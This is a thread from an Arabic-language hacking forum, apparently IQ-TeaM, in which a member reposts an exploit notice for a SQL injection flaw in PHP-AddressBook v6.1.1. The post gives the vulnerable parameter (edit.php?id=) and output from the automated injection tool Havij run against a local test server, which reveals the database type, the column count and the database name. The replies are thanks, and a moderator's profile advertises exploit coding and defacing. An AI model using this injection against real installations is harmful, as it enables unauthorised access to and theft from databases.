1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Ubuntu | المشاهدات : 538 | الردود : 3
حالة الموضوع:
مغلق
  1. Ubuntu

    Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    نظام التشغيل:
    Linux
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته


    ثغرة sql

    كود PHP:
     site/path/edit.php?id=

    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ \ | \ | | /  __ \ \ / / ___ \  ______ \
      | | | | | |  \| | | | \ `
    --.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . 
    ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |
    _| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \
    _/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93AuthorTUNISIAN CYBER
    ***91;+***93Exploit Title:  PHP-AddressBook v6.1.1 (edit.phpSQL Injection Vulnerability
    ***91;+***93Date8-12-2013
    ***91;+***93Vendor:aguestbook.sourceforge.net/
    ***
    91;+***93CategoryWebApp
    ***91;+***93Google Dorkn/a
    ***91;+***93Tested onWin7 ubuntu 13.04
     
     
    ########################################################################################
    Exploit:
    127/PATH/edit.php?id=***91;SQL***93;

    Localtest:http://oi44.tinypic.com/b4t37n.jpg
    ---------------------------
    Havij Result:
    Host IP127.0.0.1
    Web Server
    Apache/2.2.8 (Win32PHP/5.2.6
    Powered
    -byPHP/5.2.6
    Keyword Found
    Smith
    I guess injection type is Integer
    ?! If injection failedretry with a manual keyword.
    DB ServerMySQL
    Selected Column Count is 25
    Valid String Column is 2
    Current DB
    address



    ./3nD
    ########################################################################################
    Greets toXMaXtnN43il HacK3rXtechSEt

     
  2. rachi-dz

    rachi-dz Developer

    الأنتساب:
    ‏6 يونيو 2012
    المشاركات:
    57
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    طالب
    الإقامة:
    القيسة كدد
    رد: PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

    تِسلَـمْ أخِي
    بَاركـَ الله فِيكَ
     
  3. M3N X

    M3N X Developer

    الأنتساب:
    ‏16 يوليو 2013
    المشاركات:
    97
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    نظام التشغيل:
    windows 8.1
    رد: PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

    يعطيك العافيه موضوع رائع
    تم تقيمك !:"
     
  4. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    رد: PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

    ^:"^:"^:"^:"^:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة